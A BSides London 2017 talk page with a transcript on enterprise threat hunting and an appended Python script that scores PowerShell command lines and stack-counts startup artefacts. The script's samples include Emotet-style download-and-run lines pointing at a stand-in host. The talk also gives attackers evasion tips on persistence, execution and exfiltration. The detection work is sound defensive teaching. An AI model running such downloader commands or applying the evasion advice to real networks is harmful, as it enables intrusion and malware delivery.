
Hunt Or Be Hunted

BSides London · 2017 · 41:04 · 1.2K views · Published 2017-06
Category: Technical
Team: Blue
Style: Talk

About this talk
Over the last few years threat hunting has risen from being a grassroots hands-on defensive technique to all-out hype as security vendors have jumped on the bandwagon. In this talk I wanted to strip away the marketing and talk about real-life threat hunting at scale and how it differs from traditional security monitoring. I'll cover the key datasets, different analytical approaches, cutting-edge TTPs and the people/skills needed to make it happen. I'll also share some real-world compromises that would have been missed by traditional detection but were found through hands-on threat hunting.
Transcript [en]

Hi guys, my name is Alex. I'm a senior threat hunter with the team at Countercept, and in today's talk I really want to share my experiences of doing threat hunting at scale, with multiple clients, thousands of endpoints and tons of data. I also wanted to touch on the differences between threat hunting and traditional security: how they differ, why they differ, or do they differ at all? I also wanted to share some tips for how attackers can up their game. It's a bit of a free rein at the moment; attackers think they're the dog's bollocks, but there's a lot of things they can actually do to up their game as well and avoid advanced threat detection. Hopefully, by the end of this talk you'll be able to take away all the stuff I've talked about, go back to your own enterprises and implement it yourselves to supercharge your own security teams.

Just a quick intro: I said my name is Alex; it's not Ben Davis, contrary to the BSides brochure. I'm a senior threat hunter with the team at Countercept. I spend my days doing investigation, actually hands-on getting into the data, pulling files, analysing memory dumps, and liaising with our clients to remediate any issues. The other big part of what I do is attack research: understanding what attackers are currently doing, here and now, in real environments, and making sure that we can actually detect that at Countercept and that it's in our workflow. I've also got a background as a pentester; I actually used to work at MWR as a regular pentester before joining Countercept, and previous to that I was doing some more standard corporate security and security monitoring. I'm a massive BSides fan and always encourage people to participate, and I'm also a wannabe blogger, I guess, and a Twitter fan, so feel free to follow.

So my journey into threat hunting actually started about three years ago.

I was working in a fairly typical security team. We had all the usual products: McAfee, the endpoint agent, HIPS, IPS, firewalls, email analysis, all the standard stuff that most enterprises have. But even with all those products I didn't have access to raw data, and working in the security team, knowing what attackers were doing, that they were spinning up processes, that they were installing persistence on our network, I had no way to see any of that with the tools I had. So I actually ended up writing a bit of PowerShell, which I put on my blog later, and all this PowerShell did was go out to the estate and pull back data. I ran this across thousands of endpoints, pulled back all this data, did least frequency analysis on it, and actually found some interesting things and kicked off some investigations because of it. At the time I just thought, hey, I'm collecting data, I'm doing analysis, I'm finding the bad guys, but I never realised in my head that this was fundamentally a different approach to security. It was being proactive: I wasn't relying on some product to give me an alert to tell me there's a bad guy over here; I was the one actually doing that. And it's funny, fast forward three years to present day, and threat hunting and the whole proactive approach to raw data and analysis has really taken off, and it's something I do day to day.

So what is threat hunting? Sqrrl, who are a big threat hunting company, actually have quite a nice definition: it's the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions. A bit of a mouthful, but the key point is, first of all, proactive. You're not sitting back waiting for the attacker to come to you; you're going to the attacker, you're assuming that you're already compromised and you're going after them. It's also very human driven: again, you're not relying on a product, it's about the threat hunters, the people in your team who know what attackers are doing, who are actually going after that stuff. The other point I wanted to emphasise is that threat hunting is focused primarily on detection. Traditionally it was just on detection, but that's starting to expand both into prevention and into response and remediation, and really the power of having all of those components in one agent, or even one team, is efficiency. As a team you can see something

interesting, actually reach out, collect it, analyse it, and then respond to block it or do something about it. I always feel pain for all those teams out there who don't have access to endpoints and maybe have to call another team, send a request through, and two weeks later maybe you get the file back. Those kinds of processes are just insane; that's just not adequate to keep up with modern-day attackers.

To put threat hunting in a bit more context I wanted to go back to the age-old debate of manual versus automated, and this is quite relevant to threat hunting because there's a manual aspect to it. For the pentesters out there, you've probably used vulnerability scanners before, and they provide awesome value: you can scan at scale and get good-quality results very quickly. There's nothing wrong with this approach; I think it's a great approach. However, a lot of you will probably know that in terms of quality, the quality will be less with something like Nessus; you're going to miss things. Whereas if you have manual pentesters it'll often be a deeper dive into the estate, and you'll find a lot more issues that Nessus, for example, wouldn't find. Flipping this on its head and taking it from a more defensive perspective: traditional security teams have had a very product focus; they rely on someone else telling them when something is going wrong. Threat hunting is equivalent to pentesting: you've got a human who's there on site, looking at data, getting hands on, and they're also using tooling. Just like a pentester uses Nessus, sorry, Nmap, for example, to assist them, you can do the same in threat hunting: you can create rules or automatic analysis to highlight things of interest, or score things to direct your attention. We'd call this, I guess, assisted hunts; other people call it different things. In terms of maturity, traditional security teams will tend to be at that far end, focusing on just what a product tells them to do; more advanced security teams will be in the raw data, at this far end here, actually doing manual threat hunting.

So at Countercept we've developed something that we call the Paris model, and this really describes the way that we do threat hunting. It's a research-driven approach to use-case generation. Obviously we're lucky: being a security company we have a dedicated pentesting team, we have a dedicated incident response team, and anything these guys find or do in

the wild feeds directly into what we do at Countercept, so we know what attackers are doing as they discover it themselves. This is really important because you stay current, you stay relevant. The next part of this model is this top section around automation. Obviously automation is a good thing: it speeds things up, makes you more efficient, and when you're competing against an attacker who's also efficient that's really important. To give a quick example, if you look at AV, AV would be at the top of this pyramid, high confidence, right? You see a hash, boom, it gets contained, gets dealt with. But say the AV sees PowerShell running: what does the AV do? Does it block it? Does it allow it? It's a tricky one, and this is where threat hunting comes in; it tackles that world of grey that traditional approaches just can't handle. So PowerShell would actually be at maybe, I don't know, that 40% confidence level: sometimes it's legitimate, sometimes it's malicious, but having proper rules in place to highlight when it may be interesting to look at, or more likely to be suspicious, allows you to direct your hunting into it. The key point with this model is that it's research driven. As a quick example, red teams will often use HTA files; you guys have probably seen this before, PowerShell again, very prevalent. If you were doing a manual hunt for this you'd look for mshta, you'd look for powershell.exe in process data, and if you had, for example, PowerShell enhanced logging, you could look at the log data as well. But over time you're looking to automate this, to have some kind of rule or tagging in place to highlight this activity so you don't need to manually query the data every day; that's just ridiculous. Doing it manually, you want to speed it up, and over time actually add more filtering, get rid of the false positives and add more context. If you're looking at a persistence entry, say scheduled tasks, you've got the name, you've got the path of the file it's loading, you've got the frequency, how often the scheduled task runs; there are all those parameters in the metadata around it. And even for the file that it's running, can you auto-submit that to VT, for example, and get other metadata there? If you can incorporate all this in a single UI your threat hunting team will rock it; they'll be far more efficient in what they do.

The other two key things here in general for threat hunting are the people and the technology. People is a big one: it's

a human-driven approach to security. Having smart people who understand attackers, so having OSCPs, having comp sci degrees, having a strong technical grounding, is what you need. You don't want just help-desk staff who answer tickets; that's not going to cut it. Second to that, in terms of technology, having clear endpoint visibility, having visibility across as much of your network as possible, is important, just because then there's nowhere for attackers to hide, and also having some kind of analysis framework to help you with your analysis. To give another quick example of how we work at Countercept, some of you may have seen this: the recent Shadow Brokers release. At Countercept we jumped straight on that because we saw the importance of it, and actually researched into some of those payloads, DoublePulsar, which you might have heard of before, and we produced some tools to help actually detect that. This is what I mean when I say research, modern and current research; this is the kind of stuff that security teams and hunting teams need to be doing to keep up to date.

So where do you actually begin? I've talked about quite a few bits here and you're wondering where to start with all this. There's a tendency, I think, for people to almost just jump into the data: if someone gives me data I just think awesome, I'm going to dive in and start finding the bad guys. But you want to almost take a step back there. Define your requirements: what type of attack are you looking for? What threat level? Is it advanced, is it commodity, is it an insider? Each of these threat profiles will have different requirements, or even if you've got specific assets that you want to target for monitoring, it's important to define that up front in terms of use cases, and this is really the driver of your requirements: what do you actually want to look for? MITRE have actually produced a really awesome framework called the ATT&CK framework, and this covers the whole kill chain from start to finish. It has a whole series of different techniques that describe what attackers are doing, and the best thing about it is it's technical: you can click on any one of these entries and see a clear description of it, and in that it actually shows what attacks it's previously been used in, and it shows you preventative and remediative actions as well. It's a really awesome place to start, and it means you don't have to go away and do the research

yourself; you can just use this. In our experience, at least, focusing on these real-world attacker activities has given us the most value.

So what sort of data sources do you want to focus on? Again, we're thinking about how we can actually begin to detect those use cases I previously brought up. There's a tendency, I think, for organisations to work at extremes: they're either logging everything or logging nothing, or logging the wrong thing, and anyone who's tried to do this in real life has probably experienced the frustrations of this. If you go and log a tonne of firewall logs your server is probably not going to like that, and you'll have slow searching etc., and that doesn't make your security team happy. If you can tune that down and just focus on the things that matter most, that's what you want to do. The other point to mention here is around expectation: if you tell the business that you're collecting a data source, they're expecting that you're monitoring it. In the real world it's not that simple; probably 10% of your time is spent logging data and 90% of your time is spent analysing said data, so it's important to explain that to the various business areas and the C-levels, to make sure they understand that analysis is a massive component here, and it's actually really hard to do good analysis; that takes time, it takes maturity.

So what's the better way of doing this? I'd say look at the kill chain, look at how attackers are actually operating, and look at the data sources that actually apply. These are my favourite data sources; I'm sure you guys will have your own favourites as well, but the key point here is that you can see endpoint covers this whole middle section: attackers arrive on endpoints, they move between endpoints, and they steal data or make modifications to endpoints. If you don't have this data you're going to miss a hell of a lot of attacks, and endpoint data is really rich as well: it gives you a lot of context, the host name, the username, when and where a process was executed or files were dropped or network connections were made. It's a very rich data source in itself. Other data sources like firewall logs, as I said before, are very weighty; they're difficult to work with and they contain very limited information. Knowing just a port and an IP is not enough for an investigation; there's no context there, and you don't even have the data, like what data was actually sent between those two IPs; in that firewall log, again, you don't have it. So in terms of priorities you want to focus on the

stuff that really matters here, and certainly email analysis, which is where the majority of payloads enter organisations, and endpoint, where the majority of activity takes place. Even things like Bro (I love Bro) for network analysis; definitely those are things to look at. One last point on this slide is just around ease of use. Obviously with endpoint stuff you can deploy out an agent and get coverage very quickly; for things like doing Bro log analysis, and network analysis in general, you're obviously going to have to deploy kit, and if you've got 50 offices and you need to deploy kit in each of those offices and get a SPAN port set up, that's a massive project. So again, balance efficiency with reward here: endpoint data you can get very quickly, network and log stuff can sometimes take a bit longer.

So how do you do analysis? Again, this is the phase of threat hunting that is the longest and the hardest. I'm not going to beat around the bush here; it's not easy to do, but you need to know how attackers operate. At a simple level you can just look for known bad things like IOCs: you can look for a hash, here's a bad hash, awesome, kill that machine, whatever. At a more advanced level you want to look at anomalies and try to find those unknowns. It's a more powerful technique that's false-positive prone, but that's where I think the value is, and with a bit of tuning you can actually get some good value there.

Some people might be a bit angry with me for this slide, but let me explain. I think there's a whole industry built around threat intelligence and IOCs such as domains, IPs and hashes. These get touted as being very powerful and everyone should be using this information, but the thing about that is that IOCs are good at detecting things that have been seen before. It's a reactive approach, not a proactive approach, and it's really dangerous to assume that just because you've seen something once you'll see it again. Attackers are smarter than that: they change infrastructure, they change hashes; everyone here probably knows that. So again, why focus on things like IOCs? I'm not saying there's no value, there is some value here, but in particular things like IPs can be very false-positive prone and you'll spend all your time basically wading through the false positives trying to find the real hits. I'd say it's far more effective to focus on anomalies. So TTPs offer a broader approach to detection; it's not as specific, it's not as targeted as IOCs, and this is what a lot of

the stuff covered in the MITRE ATT&CK framework is: TTPs. I just wanted to run through a few examples here. I've divided this up by kind of data; ideally, in the real world you don't want to do this, you want to unify all your data sources and have almost one unified interface, but just for the sake of simplicity I've done it this way.

From an endpoint perspective there's quite a few things to look for. Starting off with binaries: they've been the go-to for a long time for attackers. It's old school, right? You just drop a payload and run it. What's nice about them is they work directly with the Windows API; they don't often spin up additional processes. In terms of detection you can look for things like the name, the publisher, the location, entropy, VT score; there's lots of metrics you can use here, or even use something like ML, the next-gen AV approach to this. But then there's many other techniques: more stealthy attackers think, okay, I'm not going to drop a binary, I'm going to use Windows utilities, I'm going to be really smart and stealthy. The problem with that is that as a threat hunter I look for those Windows utilities; I look for them every day, and it's really easy to spot malicious stuff. When you run PowerShell in a malicious way it's very different to an admin running PowerShell, so it's actually very easy to spot malicious activity involving those. The same for persistence: almost all attackers use persistence in some form, and there's a few key locations; if you can monitor them you're probably going to catch the bad guy. A few other points, like memory injection, I cover on the next slide, but priv escalation and UAC bypass are more specific techniques to bypass existing controls or escalate privileges, and these are important things to look for as well. One other thing I wanted to say on this slide was that we don't really see the more modern techniques. For those of you who follow subTee, for example, he talks a lot about MSBuild, regasm, all the more cutting-edge stuff; we rarely see that in the wild, and if you're an attacker I'd strongly recommend using that; it's probably easy to bypass stuff with it, I guess. Also around the permissions side (someone mentioned that earlier), things like icacls, attrib, as well as vssadmin: these more specific Windows utilities to modify permissions or

delete a volume shadow copy; it's worth looking out for. On the network side of things, domain information is a big one. You can integrate with third-party services here, DomainTools, PassiveTotal; not cheap, but you can get some good results with it if you've got the cash. Looking at classification, really, the history and the age of the domain, who registered it; lots of interesting things there. Looking at file analysis stuff on the wire is really nice too. You can look at the extension, but obviously attackers can change the extension, so you can also look at content-type headers, or even do MIME detection yourself; again, a lot of this is covered in Bro by default. Any kind of mismatch between those three things, so you see a JPEG coming down in the extension but it's actually containing a PowerShell script, that's obviously malicious, right? You can just make a rule to detect that. The last bit I wanted to mention here is just around logs. Obviously logs will be dependent on the log type and what type of analysis you want to do. Windows logs, just briefly: logins and lockouts are key use cases that people will often check for, but even more exotic stuff like DCSync and priv escalation, dropping a new user in the Domain Admins group; there's some simple use cases there that can again give you some quick

value. So I think there's a widely held belief in the security community that if you inject code directly into a running process no one's going to see you: you're going to bypass antivirus, you're not going to leave any files or forensic artefacts on the system, and it's an awesome technique to use as a bad guy. Now the reality is that memory anomalies are quite easy to detect from a threat hunting perspective if you have the right tooling in place, and I've listed out some of the common techniques on the left here; you guys have probably all heard of them. These are the kinds of techniques that most of the modern attack frameworks use, PowerSploit, Cobalt Strike, Metasploit; they all employ these things. If you actually start looking at the memory regions associated with these kinds of injections, the anomalies just jump out straight away: you'll be unable to trace back the module associated with those memory pages; again, it's a massive anomaly, it'll just come back with an unknown module. You can also scan that memory region and look for key characteristics like is there a PE header there, is there an MZ header. You can wipe these things if you want, and some tools do, but you'll still see, for example, an unknown module or a suspicious thread launched within that process. This is just one slide about memory injection; my colleagues Matt and Will at Countercept did a whole presentation on this that is way more comprehensive and way more awesome than this one slide; it's that link below, and I'd strongly recommend checking it out if you want to know more about this.

So least frequency analysis, or stacking, is one of the mainstays, I guess, of the threat hunting community; everyone likes talking about this. This really works from the assumption that attackers will only ever be on one or two boxes in general, and it allows you to spot anomalies.

So if you, for example, were to look at run keys across an organisation, the same run keys will be on a large number of boxes; you've got, what is it, Java Update or whatever, that'll be on a few thousand boxes. But if the attacker drops one specific run key for one specific payload on one box, that's going to appear at the low end of the scale and it's going to be anomalous. I pulled some real data just to give you a bit of an example here. The highest frequency counts are really high; this was just process data, and you can see these are just standard Windows processes; there's nothing weird about that. Then you can see at the far end of the scale there's slightly more interesting stuff: you've got, I think this is an HP driver, you've got the Intel agent, temporary files and other weird stuff; I don't know, this might be malicious. I guess this shows the power of how you can use least frequency analysis, and this is quite a limited view; you want to regard this more as just one metric in your analysis. Obviously for each of those files, like I said before, there's a location associated with it, a publisher, a VT score, an entropy rating, and that extra context can help you with investigation.

Relationship-based analysis, or graph analysis, covers the way that data points are actually related to each other, and this is a classic attacker example here: an attacker running a macro within Winword and cmd dropping out of it. If you were looking at parent process relationships you'd say okay, Winword is the parent, cmd is the child, this is extremely anomalous, and if you look across your estate you'll be able to see common relationships and uncommon relationships. But don't just limit yourself to Winword and cmd; obviously there are lots more options here, both in terms of payload delivery, wscript, regsvr32, rundll32, PowerShell, regasm, there's tons, and also parent processes as well. Obviously this is for a macro, but how about someone delivered a payload through Outlook? Then you'd have Outlook as the parent. Or if someone delivered a link and they clicked on it and went through Chrome to download and execute a payload, then you'd have a browser as the parent process. So think about these other options as well, and it's not just processes; think bigger than that, think about user sessions: how do user sessions relate to each other? Domain admins have very specific profiles that

they follow; they log on to a few specific servers, whereas regular users just log on to their workstation. If you start doing graphing, looking at how user sessions are used, you'll start to see some interesting relationships, and if those relationships actually change over time, say a domain admin account touches a thousand workstations, that's pretty anomalous. So yeah, there are other data sets to look at here: network traffic, user sessions.

Machine learning is something that's been talked about a lot in the security industry and also the wider IT community as well. At Countercept, at least, we use two specific techniques to help us spot anomalies. The first is clustering, which we actually use as a data reduction technique: if you take process data and cluster it together based on, say, the arguments, you'll see that very similar things come together and anomalous things come out the side, and that's where you can focus your analysis. Again, it's not the be-all and end-all, but it's just another metric you can add to the series of metrics that you're using. Time series anomaly detection is also quite interesting. I mentioned user sessions a minute ago; that's one application. Another is around network transfers, and this is actually what you can see up on the board here. I think this was downloads: you can see most people sit at this bottom level here, but aggregating over time and using a baseline approach you can see there are some anomalies to their usual baselines, and they pop out the top here based on high download volumes. Another approach, just touching on it quickly, is supervised classification, so you can use that for files, for example: take a thousand bad files, take a thousand good files, train your ML model, build your next-gen AV and whatnot. We actually use this for ransomware protection; that's part of the metrics that we use, and there are some other ones we do as well. But if you're sick of hearing about ML and all the hype, the other thing to do is check out our paper; it's on our website. This actually cuts through a lot of the hype in the industry and gets to the point: what works and what doesn't work, and why.

So to be able to do the stuff I've been talking about so far in a scalable and automated way, you need to think about automation. I recently watched a movie

called The Founder, and for anyone who's not seen it, it's basically the story of McDonald's. There's an interesting scene in that movie where they go to a tennis court, get some chalk, and actually draw out the McDonald's kitchen on the ground, and they try to figure out where to place everything in the most optimal configuration so they can make burgers in the most optimal way. This reminded me of how important it is for security teams to be efficient and work together. If you think about McDonald's, they suffered from having other competition in town; they had to be fast, they had to be efficient, they had to be cost effective. It's the same for security teams: we're facing attackers who are also fighting for efficiency within their own teams, and whoever's the fastest, whoever's the most agile, whoever's the most technically competent is going to win. It's interesting, because when you look at less able security teams, they just get stomped on by attackers because they just aren't able to be fast, efficient or technically capable. Ideally, I think you want to review your workflow and figure out where your pain points are, from detection all the way to response: what's taking the longest, why aren't things working? The more you can speed up, the more awesome research you can start doing, the more capability you can add, and it ends up as a positive feedback loop.

So I wanted to share a few more practical tips around automation. I said it before: data analysis using scoring and rules, or assisted hunts, is really useful. If you see PowerShell running with any kind of suspicious arguments, doing in-memory injection for example, you want to highlight that straight away to your team. Again, don't think of it as an alert; think of it as something that's interesting and worth investigating. It's not as simple as black and white in threat hunting; it's all about scoring and highlighting more interesting things over less interesting things, if that makes sense. Context, again: adding more metrics to your views, making sure your guys can see all the data they need to and don't need to click between different systems; that's again ridiculous. Get it all in one page, make it easy to use. Prevention and response I talked about before. Ticketing is a big one; I think we all hate ticketing, to be blunt. It's very time consuming, but it's a necessary evil, I guess, in security: you have to track incidents, you have to collaborate with people, so using ticketing makes sense. But again, thinking about automation, how can you right-click on something and have that automatically generate a ticket? Or you've seen something new over here, how do you add that to a ticket automatically? Don't force your threat hunting team to have to do everything manually, typing this all out. Payload analysis as well: malware analysis can take a long time in general, and you can speed that up with things like plugins, which is really useful. And lastly, bots; really interesting area, bots, to actually improve communication within

the business um this is something that's quite new but I think it's actually really interesting is it's got a lot of Promise going forward in the future so I'm going to skip ahead a little bit here CU think I'm running a bit late um so I want to talk about a quick Insider attack and and this is a real world example this actually something we we detected at counter um and uh if you look at this uh there was actually a binary we saw through uh lease frequency analysis and this was actually in the the startup folder of of multiple systems actually and we actually traced this back and we did a wider search across the estate um

for this file and found it running on multiple systems. Pulling back the file and analysing it, it turned out it was a Python keylogger that was spitting out a text file to the local machine. Looking at the timelines, it was quite interesting, because we saw it when it was on a few hosts, and then as we were investigating it actually ended up on more hosts. We traced this back through timestamp analysis and found that it started on one host, and it turns out that this one host was the insider, who'd foolishly run the payload on his own machine first. So this was not too difficult an

investigation, right? Looking at his box more, we found out he was actually distributing this through Advanced IP Scanner, which is just a tool that allows you to connect to multiple machines, and we could see the network data and the user session data that tied all this up. You may wonder what the significance of this attack is. Well, this guy was actually trying to escalate privileges to target an ATM network, to try and steal money. We jumped in there before he was able to do any damage, so a big win for us, a big win for the client.

Emotet is a strain of commodity malware. It came out, I think, early this year; there was a whole email distribution campaign, and this is something we picked up, we saw it being used in the wild. It actually used a macro with this payload here. Picking apart this payload, you can see some pretty obvious things in terms of detection. Hidden window you'd think would be really suspicious, but it's actually really common, admins use it all the time, so it's rated a three out of ten; this is based on how severe or important I think it is. WebClient download is something that's really anomalous; it's definitely something you should be covering if

you're looking at PowerShell logs. URLs as well, Start-Process, and in general from Windows, if you see network comms, if you see file writes to specific locations, it'd be quite interesting. Obviously this sample here just basically went out to these sites, downloaded a binary and dumped it on the local machine before starting it. This is way too easy, right? You're all thinking, hey, show me a real example. So, for those who've seen it, Daniel Bohannon has got an excellent project on GitHub called Invoke-Obfuscation, and this is all about PowerShell obfuscation. You can turn reasonably easy-to-read stuff like this

into horrible stuff like this. But again, you can do analysis of this and actually spot it quite easily. A few quick points: IEX at the top corner here is a great indicator to look for, strongly recommend it. The bottom part here is decoder stubs; these are static and used in this framework. They change slightly, but you can just signature this. In terms of this middle section, obviously this is extremely anomalous: you've got all kinds of weird letters and numbers, there's no spaces. You can do a kind of ratio analysis to separate this from more legitimate PowerShell, and also length is the other big one. Anything that gets obfuscated grows

massively in length, so it's something you can actually use to detect it.

So a lot of the stuff I've talked about today has been very threat hunting and defence focused, and for any offensive guys in the audience you may be wondering, how do I do offence better? So I put down a few ideas; I'm just going to quickly run through these. Macros and HTAs: those are the primary ways right now of delivering payloads. Don't use them, is my advice. Be more creative: focus on social engineering, abuse third-party services, target users directly, or try to use avenues that

won't create, say, endpoint data or easily trackable data. If you go through a third-party service, there's no way, as a threat hunting team, we're going to have those logs; there's no way we can trace that. And also targeting personal assets. It's a grey area, this one, but I'm just telling you how it is: that's the reality. A real-world attacker will target personal assets, they'll target the users directly, they won't care if it's corporate or not. They want creds, they want access. So, thinking in terms of execution: avoid all those things I've talked about, cmd, PowerShell, all those standard utilities. We look for them; they're

really blatantly obvious in terms of maliciousness, so just don't use them if you can. Often dropping binaries could be a better option here, as long as you can bypass AV. Also things like WMI: again, that can be detected too, but it's just a bit harder, or often has less coverage in security teams. The Windows API is a really interesting one as well. If you look at the data stack from top to bottom, you've got application-level stuff at the top, in the middle you've got process stuff, and at the bottom you've got direct Windows API stuff. If

you look at how these datasets stack up, the API stuff is huge; you get so much data if you start monitoring the Windows API, so it's often just not possible to use that data, whereas process data is pretty manageable. So as an attacker, if you can compile a binary and use that to access the Windows API, for example to do net enumeration instead of using net.exe, you're going to bypass any Windows-utility rules just by calling the API directly. This applies in a few different areas. It's something that I'd probably say is a bit under-researched, but it's something

that I'd suggest focusing on. In terms of persistence, don't use the common locations. We all know about them: we know Run keys are used, we know services and scheduled tasks are used. Don't use them; be more creative. WMI, again, better options here; often people don't monitor them. Office templates, Outlook rules: this is the more in-vogue stuff, the latest cool thing pentesters use. Again, coverage will come for that in the next few months, but right now I'd argue it's not very well covered by most security teams. DLL side-loading is something that's taken off quite a lot; a lot of APT groups have started using this, and

more nation-state threat actors. It's quite hard to detect: there's not a single location you can query and say, show me all things DLL-loaded. Instead you have to enumerate all the processes and the DLLs they have loaded, then do least frequency analysis, and that's a bit more long-winded. In general, if you don't need to use persistence, don't use it.

So in terms of exfil, there are a few things here. I touched on it earlier: using legitimate services as much as possible, Google, Facebook, Twitter, you name it. This came up earlier: Turla, the Russian APT group, were using, what, Britney Spears's Instagram. It's that kind of stuff that's

extremely hard for us to detect. We don't have the logs from those services, and often that traffic will be encrypted, so it can be quite difficult to detect that kind of stuff. DNS tunnelling is another technique that pentesters love and think is really cool. Again, if you've got the network traffic, it's really easy to detect; I'd say avoid it if possible. But again, it assumes that the defenders have that data. If they don't, maybe you can use that. And lastly, going low and slow; it's the age-old thing. If you take your time as a pentester, don't be noisy, don't create spikes on graphs, you're probably going to sneak

by. So how do you actually do detection yourselves? Obviously a lot of the stuff I've talked about today is enterprise level, thousands of endpoints, paid-for products and stuff. You may be wondering how you actually do this if you wanted to go home tonight and play with this stuff. There's some open-source stuff that's free to use: osquery, GRR, as well as Sysmon. I really love these technologies; anyone can use them, they're free to deploy, and you can just chuck that data into Elastic. Again, it's very scalable technology, it's efficient, easy to use and it's free. And there are a number of different frameworks you can use:

Etsy produced 411, there's ElastAlert, which I think was Yelp, and Elastic DSL, which is just supported out of the box by Elastic. So there's a lot of options here. And lastly infrastructure. You'll notice today I've not talked about infrastructure at all. Underpinning this whole threat hunting operation is a massive infrastructure, a team with hundreds of servers and stuff; that's a whole other talk at a conference, to be honest. But again, thinking about scalability: Puppet, Chef, Ansible, Docker, these are the kinds of technologies you want to be thinking about.

So I think over the last few years we've seen a bit of a shift, from attackers having almost free

rein over networks, to be able to do what they want, compared to now, where with the proper detection and the proper prevention in place it can be quite hard to compromise an organisation. But the only way I think defensive teams can continue to be successful is working closely with the red team, doing this kind of purple teaming thing where you all learn from each other. I learn how to bypass pentesters, pentesters learn how to bypass me, right? And it helps everyone. At least in Countercept, a lot of us came from a pentesting

backgrounds, right? Me myself, I was a pentester, and I saw the state of the defensive industry and I thought, F this is awful, man, we've got to do better here. I ended up moving across, and now I'm in Countercept doing threat hunting. It's funny: I went to Infosec yesterday and you look at all the vendors and you look at these products and you think, wow, this is a lot of snake oil. Do these products really work? I don't know; maybe some do. But at Countercept we wanted

to improve the situation. We knew that with the right data and the right knowledge of attackers we could improve this entire industry. And you saw the stuff today; I'm just sharing what we're doing. You don't have to pay for this; it's all there, it's all free. It's funny, because I think if you look at the defensive industry right now, it's pretty much like what pentesting was like back in 2005 or whatever. We're just starting out, we've just got Nmap or whatever; we don't have all the cool stuff yet, we don't have PowerSploit. We're still at the basic level, we're still learning, we're still

improving. So I'd say, if anyone in the crowd is here and you're looking for a challenge, you're looking to define an industry and make the Metasploit of the defensive world, now's the time to join, and now's the time to make an impact. So if you're interested to learn more about threat hunting, feel free to grab me after this talk, or message me, message Countercept. But yeah, that's pretty much it for me. Thanks for listening, guys. [Applause]
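The two analytical techniques the speaker describes, scoring PowerShell command lines with weighted indicators (hidden window, WebClient download, URL, Start-Process, IEX, symbol ratio and length) and least frequency analysis of startup-folder artefacts across hosts, as an added example that is not part of the talk and not Countercept's or Invoke-Obfuscation's code. It goes slightly beyond the talk in that the stack-count helper also orders each artefact's hosts by first-seen timestamp, the step the speaker did by hand to find the insider's own machine. The rule weights, thresholds, host names and all sample events are constructed assumptions for illustration.

```python
"""Assisted-hunt helpers in the spirit of the talk: score PowerShell command
lines with weighted rules plus obfuscation heuristics, and stack-count
startup-folder artefacts across hosts to surface the least frequent ones.
Added example, not the speaker's or Countercept's code. All weights,
thresholds, host names and events below are constructed assumptions."""
import re
from collections import defaultdict

# Weighted indicators. The weights mirror the talk's reasoning (hidden window
# is common admin usage, so low; WebClient downloads and IEX are anomalous,
# so high), but the exact numbers are this example's assumption.
PS_RULES = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 3),
    ("webclient_download", re.compile(r"Net\.WebClient|Download(?:File|String)", re.I), 8),
    ("url", re.compile(r"https?://", re.I), 5),
    ("start_process", re.compile(r"Start-Process|\bsaps\b", re.I), 4),
    ("iex", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 7),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 6),
]


def symbol_ratio(cmd):
    """Share of characters that are neither alphanumeric nor whitespace.
    Obfuscated PowerShell is dense in quotes, braces and operators."""
    if not cmd:
        return 0.0
    return sum(1 for c in cmd if not c.isalnum() and not c.isspace()) / len(cmd)


def score_powershell(cmd, long_threshold=1000, ratio_threshold=0.25):
    """Return (score, hit_names). Higher scores sort to the top of a hunt
    view; they are triage ordering, not alerts."""
    score, hits = 0, []
    for name, rx, weight in PS_RULES:
        if rx.search(cmd):
            score += weight
            hits.append(name)
    # Obfuscation heuristics from the talk: length balloons, and the
    # symbol-to-character ratio drifts far from hand-written scripts.
    if len(cmd) > long_threshold:
        score += 5
        hits.append("long_command")
    if symbol_ratio(cmd) > ratio_threshold:
        score += 6
        hits.append("high_symbol_ratio")
    return score, hits


def least_frequent(observations, max_hosts=2):
    """Stack-count (host, artefact, first_seen) rows. Returns artefacts present
    on at most max_hosts hosts, each host list ordered by first_seen so index 0
    is the earliest host, the way the talk traced the keylogger to the insider."""
    first_seen = defaultdict(dict)
    for host, artefact, ts in observations:
        prev = first_seen[artefact].get(host)
        if prev is None or ts < prev:  # ISO-8601 strings order lexically
            first_seen[artefact][host] = ts
    return {artefact: sorted(hosts, key=hosts.get)
            for artefact, hosts in first_seen.items() if len(hosts) <= max_hosts}


# Constructed sample telemetry (not real events).
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -Command Get-Service | Where-Object Status -eq Running",
    # Emotet-style downloader: hidden window, WebClient, URL, Start-Process.
    "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/a.exe','C:\\Users\\Public\\a.exe'); "
    "Start-Process 'C:\\Users\\Public\\a.exe'",
    # Invoke-Obfuscation-style: IEX, format-string reassembly, no spaces.
    "IEX(\"{1}{0}\"-f'-Object','New')(\"{0}{1}\"-f'Net.','WebClient')"
    ".DownloadString('http://example.invalid/x')",
]
SAMPLE_STARTUP = [  # (host, startup-folder artefact, first seen)
    ("WS01", "OneDrive.exe", "2017-01-10T08:00:00"),
    ("WS02", "OneDrive.exe", "2017-01-10T08:05:00"),
    ("WS03", "OneDrive.exe", "2017-01-11T09:00:00"),
    ("WS01", "Teams.exe", "2017-02-01T08:00:00"),
    ("WS02", "Teams.exe", "2017-02-01T08:10:00"),
    ("WS03", "Teams.exe", "2017-02-02T08:00:00"),
    ("WS12", "update_helper.exe", "2017-03-02T09:10:00"),
    ("WS07", "update_helper.exe", "2017-03-01T17:45:00"),
]

if __name__ == "__main__":
    ranked = sorted(SAMPLE_CMDLINES, key=lambda c: score_powershell(c)[0], reverse=True)
    for cmd in ranked:
        score, hits = score_powershell(cmd)
        print(f"{score:3d} {hits} {cmd[:60]}")
    print(least_frequent(SAMPLE_STARTUP))
```

The benign admin one-liner scores zero, the Emotet-style downloader lights up four rules, and the Invoke-Obfuscation-style line is caught by IEX, the download call and the symbol ratio even though it is short; tune the ratio and length thresholds against your own estate's baseline of legitimate PowerShell before relying on them for ordering.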